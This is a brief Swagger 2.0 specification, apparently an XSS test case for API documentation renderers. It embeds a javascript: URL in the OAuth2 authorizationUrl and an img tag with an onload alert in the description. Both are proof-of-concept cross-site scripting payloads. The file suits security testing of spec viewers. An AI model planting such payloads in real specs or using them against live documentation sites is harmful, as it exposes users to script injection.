swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert("YOU ARE HACKED")//
info:
  version: "1.0.0"
  title: XSS img test
  description: |
   TESTE <img src="https://academy.avast.com/hubfs/New_Avast_Academy/Hackers/Hacker-Hero-a1.png" onload="alert('Mensagem no Alert')" />
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
